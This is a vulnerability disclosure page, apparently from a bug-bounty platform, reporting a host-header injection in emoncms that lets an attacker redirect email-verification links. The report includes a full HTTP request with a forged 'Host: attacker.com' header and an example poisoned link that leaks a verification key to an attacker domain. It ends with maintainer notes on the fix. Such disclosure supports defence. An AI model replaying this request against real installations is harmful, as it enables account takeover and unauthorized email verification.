Misinterpretation of Input in emoncms/dashboard


Reported on

Jul 22nd 2021

ūüí• BUG

account takeover via host-header injection It allow attacker to change url of account-verification link and verify any email-address .


1. First as attacker create a account with email abc@gmail.com. You dont own that email-address .
You cant login untill you verify that email address. But you are not owner of that email .
Now attacker send bellow account-verify request

GET /user/resend-verify.json?&username=bounty HTTP/1.1
Host: attacker.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://emonsdfcms.org/
Cookie: PHPSESSID=juvfp27bj0234ib10irro8a06e

Here in this request header see i put Host: attacker-domain.com and send the request .
Now vicitm email address will received a verification link like https://attacker-domain.com/user/verify?email=yagefix460@dedatre.com&key=49939b70ea5ee9979a67376d47d59a7b .
Here in this url see attacker domain . When vicitm will open his mail and click that verification link then verification code will be sent to attacker-domain .\

We have contacted a member of the emoncms/dashboard team and are waiting to hear back 2 years ago
ranjit-git modified the report
2 years ago
A emoncms/dashboard maintainer validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
A emoncms/dashboard maintainer marked this as fixed with commit 58af4f 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
A emoncms/dashboard maintainer
2 years ago


I've fixed this vulnerability in the core emoncms/emoncms repository:


Thanks a lot for notifying me of this vulnerability!

A emoncms/dashboard maintainer
2 years ago


The fix suggests that the user set's their emoncms domain manually in the emoncms settings file which ensures that $_SERVER['HOST'] is not used to discover the installations domain name.

to join this conversation